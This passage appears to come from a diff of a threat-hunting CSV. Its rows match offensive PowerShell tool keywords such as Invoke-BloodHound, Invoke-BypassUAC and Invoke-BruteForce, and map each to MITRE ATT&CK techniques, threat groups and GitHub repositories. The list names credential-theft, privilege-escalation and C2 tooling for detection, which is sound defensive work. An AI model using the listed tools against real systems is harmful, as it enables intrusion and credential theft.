TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BackdoorLNK.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-BadPotato*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" -"*Invoke-BetterSafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Binary *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"*Invoke-BitlockerCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-BlockETW*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-BlockETW*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-BetterSafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Binary *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Invoke-BitlockerCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-BlockETW*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-BlockETW*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*InvokeBloodHound*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","0","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" -"*Invoke-BloodHound*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*invoke-bloodhound*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*Invoke-BloodHound*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*invoke-bloodhound*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*Invoke-Bof *","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Invoke-Bof.ps1*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" -"*Invoke-BruteAvailableLogons*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" -"*Invoke-BruteForce*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-BruteLogonAccount*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" -"*Invoke-BruteLogonList*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*Invoke-BruteAvailableLogons*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*Invoke-BruteForce*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-BruteLogonAccount*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*Invoke-BruteLogonList*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" "*Invoke-BSOD*","offensive_tool_keyword","Invoke-BSOD","A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. Also enumeartes Windows crash dump settings.","T1561 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/peewpw/Invoke-BSOD","1","0","N/A","N/A","3","265","73","2018-04-03T13:36:45Z","2018-03-30T14:20:10Z" "*Invoke-BuildAnonymousSMBServer -*","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","0","N/A","6","3","222","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" "*Invoke-BuildAnonymousSMBServer.ps1*","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","1","N/A","6","3","222","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" -"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-CallbackIEX*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Carbuncle*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CallbackIEX*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Carbuncle*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-Cats -pwds*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*Invoke-Cats.ps1*","offensive_tool_keyword","icebreaker","Gets plaintext Active 